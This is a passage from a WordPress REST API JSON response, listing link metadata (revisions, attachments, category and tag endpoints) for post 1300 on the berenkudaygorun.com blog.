orun.com\/blog\/wp-json\/wp\/v2\/posts\/1300\/revisions"}],"predecessor-version":[{"id":1301,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1300\/revisions\/1301"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1300"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1300"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1300"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}